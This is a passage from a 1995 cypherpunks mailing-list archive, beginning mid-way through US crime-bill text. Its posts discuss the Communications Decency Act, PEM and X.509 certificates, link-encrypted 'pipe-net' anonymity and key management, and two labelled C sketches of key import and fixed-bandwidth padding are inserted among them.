          such a reasonable belief, unless the warrant was obtained through
          intentional and material misrepresentation.

          `Sec. 3509. General limitation of the exclusionary rule
            `Except as specifically provided by statute or rule of procedure,
          evidence which is otherwise admissible shall not be excluded in a
          proceeding in a court of the United States on the ground that the
          evidence was obtained in violation of a statute or rule of
          procedure, or of a regulation issued pursuant thereto.'.
            (b) The table of sections of chapter 223 of title 18, United
          States Code, is amended by adding at the end thereof:

          `3508. Limitation of the fourth amendment exclusionary rule.
          `3509. General limitation of the exclusionary rule.


Exclusionary Evidence section in the new crime bill S3:


          SEC. 507. ADMISSIBILITY OF CERTAIN EVIDENCE.

          `Sec. 3502A. Admissibility of evidence obtained by search or seizure

            `(a) Evidence Obtained by Objectively Reasonable Search or
          Seizure: Evidence obtained as a result of a search or seizure that
          is otherwise admissible in a Federal criminal proceeding shall not
          be excluded in a proceeding in a court of the United States on the
          ground that the search or seizure was in violation of the fourth
          amendment to the Constitution.
            `(b) Evidence Not Excludable by Statute or Rule: Evidence shall
          not be excluded in a proceeding in a court of the United States on
          the ground that it was obtained in violation of a statute, an
          administrative rule, or a rule of court procedure unless exclusion
          is expressly authorized by statute or by a rule prescribed by the
          Supreme Court pursuant to chapter 131 of title 28.
            `(c) Rule of Construction: This section shall not be construed to
          require or authorize the exclusion of evidence in any proceeding.'.
                (2) Technical amendment: The chapter analysis for chapter 223
              of title 18, United States Code, is amended by inserting after
              the item for section 3502 the following new item:
          `3502A. Admissibility of evidence obtained by search or seizure.'.
            (c) Illegal Search and Seizure: 
                (1) In general: Title 28, United States Code, is amended by
              inserting after chapter 171, the following new chapter:










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 9 Feb 95 12:33:43 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502090633.WAA08858@netcom2.netcom.com>
Message-ID: <199502092033.MAA25822@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: tcmay@netcom.com (Timothy C. May)

   Unlike the
   Digital Telephony Bill, which was on greased skids, [...]

As far as I have been able to puzzle out, the source of this claim
was the same parties that wanted to work a "compromise".  I have
never really trusted its veracity.

There was lobbying by the FBI, to be sure, but was there not also
lobbying for previous such bills (including S.266)?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 9 Feb 95 09:55:25 PST
To: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Subject: Re: S. 314 and existing situation
In-Reply-To: <199502090439.UAA23399@mail.igc.apc.org>
Message-ID: <Pine.SUN.3.91.950209125321.25320B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Richard F. Dutcher wrote:

> Gee, fellas, looking over this bill, *most* of what's going on is
> just porting existing telephone law over to cybercomm. Given the
> existence of 900-sex-talk, the phone companies are clearly not being
> held responsible for content.

Doesn't the common carrier status of RBOCs give them protection from 
this?

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Feb 95 10:02:37 PST
To: cypherpunks@toad.com
Subject: NYT on HR666
Message-ID: <199502091801.NAA11707@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Katherine Seelye writes on Page One today about House passage 
of the new Search and Seizure bill.


It covers a parallel revision of appeals of the death penalty.  
And notes on abusive BATF.


For email copy send blank message to <jya@pipeline.com> with 
subject:   666_zap





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 9 Feb 95 10:39:42 PST
To: kipp@warp.mcom.com (Kipp E.B. Hickman)
Subject: Re: skronk
In-Reply-To: <3hdlgr$35a@flop.mcom.com>
Message-ID: <9502091838.AA12032@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Kipp E.B. Hickman says:
> Har! Besides the certificate problems, are there other problems with
> PEM that have prevented its adoption?

It's kind of ugly, too. The new PEM-MIME stuff should do much better,
but it's no longer really PEM per se. Look at the drafts if you are
interested. 

> > I don't really blame you much.  I mean TIPEM handles all the X.509
> > stuff just fine and PGP can't get out even the simplest of libraries,
> > or even a partial library.
> 
> Our implementation supports this X.509 stuff as well. We don't have a
> DUA yet though...

Just so you know, Kipp, there is no real support for X.500 directories
over the internet, and there never will be. No one likes the things
outside of fogeys in MIS departments who program in Cobol.
Certificates as currently envisioned by the IETF are probably
going to be stored in the DNS.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 11:01:54 PST
Subject: Re: S. 314 and existing situation
In-Reply-To: <Pine.SUN.3.91.950209125321.25320B-100000@thrash.src.umd.edu>
Message-ID: <Pine.LNX.3.91.950209140130.8757A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Thomas Grant Edwards wrote:

> On Wed, 8 Feb 1995, Richard F. Dutcher wrote:
> 
> > Gee, fellas, looking over this bill, *most* of what's going on is
> > just porting existing telephone law over to cybercomm. Given the
> > existence of 900-sex-talk, the phone companies are clearly not being
> > held responsible for content.
> 
> Doesn't the common carrier status of RBOCs give them protection from 
> this?

Hard to tell from this bill what the deal is on this. Common carriers 
aren't completely immune from prosecution or lawsuit or whatnot to begin 
with. But in addition, S.314 introduces "transmit or otherwise make 
available" into the language of the law. Which makes the -carrier- of the 
"offending" information responsible.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 9 Feb 95 11:11:25 PST
To: cypherpunks@toad.com
Subject: PEM
Message-ID: <9502091907.AA13921@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Har! Besides the certificate problems, are there other problems with
> PEM that have prevented its adoption?

That's it.

PEM "blew it" by relying on Internet-wide X.500/X.509 deployments.

They're now looking at self-signed certificates as a transition aid
to work around the adoption problems, particularly in the face of the pressure
brought by the success of PGP.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Thu, 9 Feb 95 14:17:09 PST
To: cypherpunks@toad.com
Subject: LESM - Link Encrypted Session Manager
Message-ID: <199502092216.AA09906@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3926.1071713479.multipart/mixed"

--Boundary..3926.1071713479.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----

I finished hacking Matt's ESM to do link encryption yesterday, but 
for some reason the mail I sent to cypherpunks didn't get echoed back 
to me, so I'm sending this again.

To install: get ESM and RSAREF, make sure you can compile ESM, 
then replace the esm.c with my hacked version and recompile.

To use: same as ESM, but there's an extra option "-b bandwidth", the 
default is 100 cps.

I've attached the modified esm.c here since it doesn't include any 
crypto code.  To get ESM, write to cfs@research.att.com and state the 
following:

	- you are in the US or Canada, and
	- you are a US or Canadian citizen or legal permanent
	  resident, and
	- You've read and understand the license and export
	  conditions.

RSAREF is in ftp://rsa.com/rsaref/

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzqTtTl0sXKgdnV5AQEmbgP8CRxE+RCGsDXwwShWhZKGytSywyWZ8RXB
RPBHZmk6UgdpCR2VVo8wXjcPuEv4SHp9ZjhFTq53JZ/s3YcV5FxF33/ivSlh1Ra4
P8GSYnoEaIJoFrJyagukbBUaY6zWCx0PcnsLoVArCxujwRYwfrQvHdiNx13z7bJh
OSEhhoE9djg=
=PY8P
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?

This message contains a file prepared for transmission using the
MIME BASE64 transfer encoding scheme. If you are using Pegasus
Mail or another MIME-compliant system, you should be able to extract
it from within your mailer. If you cannot, please ask your system
administrator for help.

   ---- File information -----------
     File:  lesm.c
     Date:  8 Feb 1995, 23:57
     Size:  19769 bytes.
     Type:  Text


--Boundary..3926.1071713479.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "lesm.c"
--Boundary..3926.1071713479.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and Billionaires and Babies)
Date: Thu, 9 Feb 95 11:44:32 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Encryption Module
Message-ID: <199502091940.OAA10609@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9502090612.E21224-0100000@lia.bga.com>,
Nathan Zook <nzook@bga.com> wrote:
>As I've considered this problem, I've arrived at essentially the same
>conclusion.  We need an RSA-IDEA package that does something very close to
>Mixmaster.

I'm a-hackin' as fast as I can!

Seriously, this is exactly what I had in mind when I started out on the
Hastur Crypto Toolkit.  Data formats will be parameterized, with parameters
for well-known systems like PGP included with at least minimal
auto-selection support.

See the Hastur Status thread for the one real problem that isn't just a
SMOP: key management.
- --
Todd Masco     | "No matter how peculiar the medium or incongruous the scale,
cactus@hks.net |   the instinct to build persists."   - Joy Of Cooking
     Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzpvqSoZzwIn1bdtAQG2+AGA2mP0eRIcgMKBAaeeMPr2Ik/mTN1SZ5y8
9MA8dM11fOvKah/EJRMwaTZ2RGuE/bv6
=r9eh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Thu, 9 Feb 95 15:13:35 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502091458.JAA26730@libws4.ic.sunysb.edu>
Message-ID: <Pine.3.89.9502091515.A5767-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:
> It's not a mandate. It's an order from god. (As if you didn't know, it
> says in the bible that the Republican party is his official mouthpiece.)

Exon, who is the primary sponsor and spokesman for the 
"Communications Decency Act" is a tax-and-spend Democrat.

This conforms to my expectations, prejudices, and assumptions
about the way the world works.

I assume your prejudices are different.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gnu
Date: Thu, 9 Feb 95 15:56:12 PST
To: gnu@toad.com
Subject: Wed 15 Feb, 730pm: BayFF's first monthly Bay Area EFF meeting
Message-ID: <9502092356.AA05230@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


EFF is pleased to introduce a series of monthly `BayFF' meetings in
the San Francisco Bay Area.  All EFF members, guests, and the public
are invited.

The first meeting will be in San Francisco on February 15, 1995, at
7:30PM.  The gracious donor of our first meeting place is:

	Wired Magazine
	520 Third Street, Fourth Floor
	San Francisco, CA
	+1 415 222 6200  voice

John Gilmore and Cindy Cohn will speak on the constitutional issues
around export controls on cryptography.  John is a co-founder of EFF
and Chair of the EFF Board's Crypto Committee.  Cindy is an attorney
in private practice at McGlashen and Sarrail in San Mateo.  These
controls inhibit free speech, publication of software and papers,
academic freedom of inquiry, and personal privacy, as well as having a
strong negative impact on computer security.  We'll explore some of
the implications and prospects for change.

Dave Farber will speak on "Living in the Global Information
Infrastructure -- some concerns".  Dave is an EFF Board member and has
more years of experience in computers and networking than the total
experience at many startup companies.  Vice President Gore has proposed
that the nations of the world undertake the building of a Global
Information Infrastructure -- the GII.  While most leaders agree with
the spirit of the Gore proposal -- namely to provide a mechanism which
could invigorate the world economy in the forthcoming information age,
many disagree with his belief that it will bring democracy to the
world.  They interpret such statements as being another example of
American colonialism.  It is this basic lack of uniform global
agreement on what terms mean, what rules apply to electronic commerce
and what impact a GII will have on their nation that underlies the
comments Dave will make.  These raise questions about the universality
of Cyberspace.  He will seek to table a set of questions that may
stimulate your thinking in this area.

There will also be plenty of time for general and specific questions,
issues, discussion, meeting people, and socializing with frontier-
minded folks.

We will schedule the second monthly meeting near the Computers,
Freedom, and Privacy conference -- tentatively on Friday night,
March 31.  Watch this space for more information.

We hope to see you on Wednesday!

	John Gilmore
	Jane Metcalfe
	Denise Caruso
	(Bay Area members of the EFF Board)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A Loose Affiliation of Millionaires and Billionaires and Babies <cactus@hks.net>
Date: Thu, 9 Feb 95 16:57:51 PST
To: cypherpunks@toad.com
Subject: Key management in Hastur
Message-ID: <199502092115.QAA11291@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Eric, if I understand you correctly, you're saying that the manner in
which trust is bestowed in keys should not be generalized.  Is this
correct?  I don't have a problem with that, and wasn't terribly interested
in defining trust parameters.  I do want to finish this in the next 4 to 6
weeks, after all.

However, that's not exactly the problem I'm trying to solve;  The phrase
"key management" is likely too vague or perhaps has specific connotations
that I'm unaware of, such that I'm using it wrongly.  I was never strong
on jargon, and "key management" is the phrase that came closest to an
expression of the problem I'm trying to solve.

The problem is this: You have a bitstream and you want to perform
a cryptographic function on it.  Therefore, you need a key.  For RSA
functions, I know of two different ways that keys are distributed:
PGP and X.509.  My intent is to support PGP keyrings and PEM-style
keyrings (I am not yet familiar with the latter)... having a way to
place keys into their proper keyrings would be nice, too, but there's
no way I'm going to worry about that in the first rev.  Would I be
understanding you correctly if I characterized your advice as being
to not plan to implement that at all?

There are two ways that I could approach handling keys in the code:

	1- Have a general RSA key format.  This would include parameters
	that are defined in either PGP or X.509 keys and would allow
	the code to hand back warnings such as "this key is not trusted
	by you" and "this key has expired."  This seems to be what you're
	advising against... 

	2- Have only a bare-bones key format that includes only the
	information necessary for crypto functions.  This is the way
	I'm leaning for several reasons, not the least of which is
	what you cite.

In either case, there must be an import function, extracting the key from
the appropriate keyrings or otherwise supplying the key.  Including functions
that extract keys from the appropriate PGP/PEM keyrings would be a Good
Thing and is right now The Plan: one can hardly expect the code to get
used if it needs Yet Another (undefined) Key Distribution method.

My X.509 vs PGP key question boils down to this: is it reasonable to try to
convert keys of one sort into keys of the other sort, providing the
functionality of converting a key obtained through an X.509 certificate
into a PGP-key?  Converting the other seems like a less desirable thing
to do, so I'm not really thinking about that problem.

I should note that in all cases in HCT where something is parameterized,
the caller can supply a callback function that matches the defined
interface and expect to win.  Thus, it's already supported (in the
general interface and soon the key handling) that a user could say
(in pseudo C code, missing parameters):

	erics_key_stub_fn(char *id, struct keytype *key, ...);

	...
	struct keytype *thiskey;
	thiskey = keyinit( KEYTYPE_RSA, (void *) erics_key_stub_fn, ...);
	if (!(get_key( thiskey, "eric@remailer.net",...))) {
          /* ... Do the right thing, etc. */
        }

Are we on a similar wavelength here, or am I totally missing the point?
The input is appreciated.

	-- Todd
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzqEYCoZzwIn1bdtAQHUcwF/QO2s178YMsxdSWQj6UDDErCDRv6+gaB5
CJnEyrRPwpS8jqRLOSDQmyjHDvOJbJS2
=xm8Q
-----END PGP SIGNATURE-----
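
The second option described in the message above (a bare-bones key plus per-format import callbacks), as an added sketch; it is not Hastur code and not part of the original post. All type and function names, the toy key sizes and the keyring entries are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Bare-bones key: only what an RSA public-key operation needs.
   Trust flags, expiry dates and names never leave the importer. */
struct bare_key {
    unsigned char modulus[8];     /* toy size, constructed data */
    size_t        modulus_len;
    unsigned long exponent;
};

enum key_status { KEY_OK = 0, KEY_NOT_FOUND, KEY_EXPIRED, KEY_UNTRUSTED };

/* Hypothetical callback interface: one importer per keyring format. */
typedef enum key_status (*key_import_fn)(const char *id, long now,
                                         struct bare_key *out);

/* Constructed PGP-style ring: each entry carries a local trust flag. */
struct pgp_entry { const char *id; int trusted; struct bare_key key; };
static const struct pgp_entry pgp_ring[] = {
    { "alice@example.org", 1, { {0xC3, 0x51, 0x0F, 0x9D}, 4, 17 } },
    { "bob@example.org",   0, { {0xA1, 0x77, 0x20, 0x3B}, 4, 17 } },
};

static enum key_status import_pgp(const char *id, long now,
                                  struct bare_key *out)
{
    size_t i;
    (void)now;                    /* this toy ring has no expiry field */
    for (i = 0; i < sizeof pgp_ring / sizeof pgp_ring[0]; i++) {
        if (strcmp(pgp_ring[i].id, id) != 0) continue;
        if (!pgp_ring[i].trusted) return KEY_UNTRUSTED;
        *out = pgp_ring[i].key;
        return KEY_OK;
    }
    return KEY_NOT_FOUND;
}

/* Constructed X.509-style store: each entry carries a validity end time. */
struct cert_entry { const char *id; long not_after; struct bare_key key; };
static const struct cert_entry cert_store[] = {
    { "carol@example.org", 200, { {0x8F, 0x02, 0xD4, 0x6B}, 4, 65537 } },
};

static enum key_status import_x509(const char *id, long now,
                                   struct bare_key *out)
{
    size_t i;
    for (i = 0; i < sizeof cert_store / sizeof cert_store[0]; i++) {
        if (strcmp(cert_store[i].id, id) != 0) continue;
        if (now > cert_store[i].not_after) return KEY_EXPIRED;
        *out = cert_store[i].key;
        return KEY_OK;
    }
    return KEY_NOT_FOUND;
}

/* Try each importer in order.  On any failure the caller's key is
   zeroed, so a rejected key can never reach the crypto functions. */
enum key_status get_key(const key_import_fn *importers, size_t n,
                        const char *id, long now, struct bare_key *out)
{
    enum key_status result = KEY_NOT_FOUND;
    size_t i;
    for (i = 0; i < n; i++) {
        struct bare_key tmp;
        enum key_status st;
        memset(&tmp, 0, sizeof tmp);
        st = importers[i](id, now, &tmp);
        if (st == KEY_OK) { *out = tmp; return KEY_OK; }
        if (st != KEY_NOT_FOUND) result = st;   /* keep the reason */
    }
    memset(out, 0, sizeof *out);
    return result;
}
```

The warnings from option 1 ("not trusted", "expired") survive as return codes, while the key structure itself stays free of format-specific fields.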




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@daisy.ee.und.ac.za>
Date: Thu, 9 Feb 95 06:47:05 PST
To: ecarp@netcom.com
Subject: Re: Best encryption device driver for MS-DOS?
In-Reply-To: <m0rcZRT-0004IhC@s116.slcslip.indirect.com>
Message-ID: <Pine.NEB.3.91.950209162432.23367N-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


I don't know which is the "best" encrypting file system for MS-DOS.  I
currently use Peter Gutmann's SFS, and am very happy with it.  I have used
SecureDevice (from Max Loewenthal and Arthur Helwig) in the past, and
found it painfully slow on my 25MHz 386SX.  I also know of Mike Ingle's
SecureDrive, but I have not used it.  SFS and SecureDrive require a
separate partition.  SecureDevice uses a container file instead of a
separate partition. 

You also asked about Linux.  I think that Matt Blaze's CFS would work 
there, but I don't know.

--apb (Alan Barrett)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Thu, 9 Feb 95 17:03:59 PST
To: cypherpunks@toad.com
Subject: Re: Wed 15 Feb, 730pm: BayFF's first monthly Bay Area EFF meeting
Message-ID: <v0300141dab606b6fed94@[140.174.229.220]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:56 2/9/95, gnu@toad.com wrote:

>John Gilmore and Cindy Cohn will speak on the constitutional issues
>around export controls on cryptography.

Forget export; I fear that among the next n logical steps is to ban private
strong crypto for US citizens.  Otherwise what's the point of the
legislative path we're seeing trod.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@CCGATE.HAC.COM
Date: Thu, 9 Feb 95 17:25:31 PST
To: Cypherpunks@toad.com
Subject: No Subject
Message-ID: <9501097923.AA792379483@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


     From Edupage:
     
     ONLINE SPYING
     While you're connected to your favorite Web page, it's also connected 
     to you, and could be copying all sorts of information off your hard 
     drive, say industry experts. In fact, it happened last year when 
     Central Point Software used registration software developed by 
     Pipeline Communications, and inadvertently also gathered descriptions 
     of the users' systems -- the type of microprocessor, the version of 
     DOS and Windows, the type of display and mouse, and the amount of free 
     space available on the hard drive. Customers squawked, and Central 
     Point had Pipeline change the software. However, Pipeline reports that 
     at least one of its clients is using the scanning feature now -- but 
     only after getting the owner's permission. The lesson? "If you can't 
     trust it, don't connect to it." (Forbes 2/13/95 p.186)
     
John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where
JLTocher@ccgate.HAC.com       you are never lost. Your private map where every
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe


     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Thu, 9 Feb 95 17:50:02 PST
To: cypherpunks@toad.com
Subject: RE: a new way to do anonymity
Message-ID: <199502100149.AA28876@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Eric Hughes wrote:

> Now here's an important detail that needs to get done right.  Is the
> forwarding for fixed length packets, variable length packets, or
> streams?  Is this decision global or local?  What are the latency and
> aggregation effects?  How important are these for different classes
> of data?  (telnet v. voice, e.g.)

I'm not sure I understand the first question.  My idea was originally 
based on link encrypted streams.  How can forwarding variable length 
packets help untraceability?  Wouldn't an attacker just have to match 
up the sizes of incoming and outgoing packets?  Forwarding fixed 
length packets, on the other hand, just makes the system a 
remailer-net (so you'll have to do mixing, etc.).  What am I 
misunderstanding here?

> I'd suggest just getting something running first, to get some
> prototyping experience.

I just finished hacking ESM to do link encryption.  (see my 
other post)  Now if someone is willing to run a MUD type program and 
hook LESM up with it, then we'd have the first prototype of a 
pipe-net.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzrFzzl0sXKgdnV5AQFfOAP7BpGWmo7FLK02a10NVTfgLEeheBosazzz
0TbFs2dwhtL4IRtY6To25e7MN2cz4X+qKJOleWy6uGbUowygHKbd1uiHOS9DNRmx
/fKeyIlGd/Ogv6hSpiL/JDd0vx7vVx9Ho1CIy+oAFq4v8Kwd0sqQenqqvhBdoEfA
zmVUpc+82nU=
=3mfe
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Thu, 9 Feb 95 17:52:22 PST
To: Johnathan Corgan <jcorgan@aeinet.com>
Subject: RE: a new way to do anonymity
Message-ID: <199502100152.AA29075@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Johnathan Corgan wrote:

> Wei, your traffic analysis treatment of this sort of thing would go a long way
> toward uncovering weaknesses and determining operational requirements and 
> limitations.

It seems to me that if a user maintains a 24-hour a day pipe to an 
uncompromised server, then the method I described earlier against 
remailers should not work against that user.  Otherwise, some kind of 
in-out statistical analysis may work.

> Tim, what massive social effects would it have if this type of network service
> were to become widely deployed? :)

See Vernor Vinge's _True Names_ for a fictional description of a future 
where real time anonymous interactions are possible.

> At first glance, this Pipe-Net idea doesn't seem to take a lot of rocket science; 
> it seems that most of the components or algorithms are already in use, just 
> in a very different way.

This is certainly true.  The system Vinge describes is almost a 
pipe-net.  But he didn't say anything about link encryption, without 
which the system can be trivially broken.

> I can think of a number of problems already, however.  Spamming.  Bandwidth
> limitations.  Complexity of client and switch software.  Standards.  Flow
> control.
>
> In other words, all the stuff the ATM forum is already dealing with :)

I haven't responded to the comments you made about the similarity between 
pipe-net and ATM, mostly because I'm not very familiar with ATM.  But 
as I understand it, ATM is based on forwarding fixed length cells, 
whereas pipe-net is based on fixed-bandwidth link encrypted streams.

Spamming, and flow control shouldn't be problems, since all users 
of a server will connect to it with pipes of the same bandwidth, so it 
can just accept a certain number and then stop.

Bandwidth limitations will depend on how fast the server CPU can do 
the encryption and decryption.  With LESM at 100 cps, each connection 
took 2% of the CPU capacity of a Sun 4-CPU(90Hz) 4/670MP.  Of course, 
I made no consideration for efficiency when I hacked ESM, so this can 
probably be decreased quite a bit.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzrGOzl0sXKgdnV5AQE1TQP/UR0xfaS/Nxk7ta/AfdRhzV+v+BmpxT4O
UqiMkCpXRZbMFTuw/hnhlJ9fuOF2QS/50MUHXu+kiFSASH5wBFpLNSgWuFIHADny
76RYSjpA+A4IpWomihGT1/BPZkyIcooDXCKGUbgWjZhi50S0oCfAILjV/1ti2f02
AOyBxRYRYvM=
=IhUw
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?
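
The contrast drawn in the two messages above (forwarded variable-length packets can be matched by size, a fixed-bandwidth pipe cannot), as an added sketch; it is not Wei Dai's LESM code and not part of either post. The cell size, the one-byte length field and every function name are assumptions, and the link encryption that would cover each whole cell is omitted.

```c
#include <stdio.h>
#include <string.h>

#define CELL_SIZE    16               /* bytes on the wire every tick (assumed) */
#define CELL_PAYLOAD (CELL_SIZE - 1)  /* one byte of each cell is a length field */
#define QUEUE_MAX    256

struct link { unsigned char queue[QUEUE_MAX]; size_t len; };

/* Queue application data; returns how much was accepted (backpressure). */
size_t link_send(struct link *l, const unsigned char *data, size_t n)
{
    size_t room = QUEUE_MAX - l->len;
    if (n > room) n = room;
    memcpy(l->queue + l->len, data, n);
    l->len += n;
    return n;
}

/* Called once per tick: always produces exactly one full cell, padded
   with zeros when there is little or nothing to send.  Under link
   encryption the length byte and padding look like any other bytes. */
size_t link_tick(struct link *l, unsigned char cell[CELL_SIZE])
{
    size_t n = l->len < CELL_PAYLOAD ? l->len : CELL_PAYLOAD;
    cell[0] = (unsigned char)n;
    memcpy(cell + 1, l->queue, n);
    memset(cell + 1 + n, 0, CELL_PAYLOAD - n);
    memmove(l->queue, l->queue + n, l->len - n);
    l->len -= n;
    return n;
}

/* Receiver side: strip padding; -1 if the length field is impossible. */
int cell_open(const unsigned char cell[CELL_SIZE], unsigned char *out)
{
    size_t n = cell[0];
    if (n > CELL_PAYLOAD) return -1;
    memcpy(out, cell + 1, n);
    return (int)n;
}

/* burst[t] bytes of application data arrive at tick t.  seen[t] gets
   the byte count an eavesdropper on the link observes at that tick.
   padded == 0: each arrival is forwarded as one variable-length packet.
   padded == 1: fixed-bandwidth pipe.  Returns payload bytes delivered. */
size_t simulate(const size_t *burst, size_t nticks, int padded, size_t *seen)
{
    static unsigned char data[QUEUE_MAX];
    unsigned char cell[CELL_SIZE], out[CELL_PAYLOAD];
    struct link l;
    size_t t, delivered = 0;
    int got;

    memset(data, 'x', sizeof data);
    l.len = 0;
    for (t = 0; t < nticks; t++) {
        size_t n = burst[t] > QUEUE_MAX ? QUEUE_MAX : burst[t];
        if (!padded) {
            seen[t] = n;              /* size on the wire == size of the data */
            delivered += n;
            continue;
        }
        link_send(&l, data, n);
        link_tick(&l, cell);
        got = cell_open(cell, out);
        if (got > 0) delivered += (size_t)got;
        seen[t] = CELL_SIZE;          /* same for every tick, busy or idle */
    }
    return delivered;
}

int main(void)
{
    /* Constructed traffic patterns: one burst versus two small writes. */
    size_t bursty[8] = {40, 0, 0, 0, 0, 0, 0, 0};
    size_t sparse[8] = {0, 0, 5, 0, 0, 5, 0, 0};
    size_t a[8], b[8], t;
    int mode;

    for (mode = 0; mode <= 1; mode++) {
        simulate(bursty, 8, mode, a);
        simulate(sparse, 8, mode, b);
        printf("%s:\n  bursty:", mode ? "fixed-bandwidth" : "variable-length");
        for (t = 0; t < 8; t++) printf(" %2lu", (unsigned long)a[t]);
        printf("\n  sparse:");
        for (t = 0; t < 8; t++) printf(" %2lu", (unsigned long)b[t]);
        printf("\n");
    }
    return 0;
}
```

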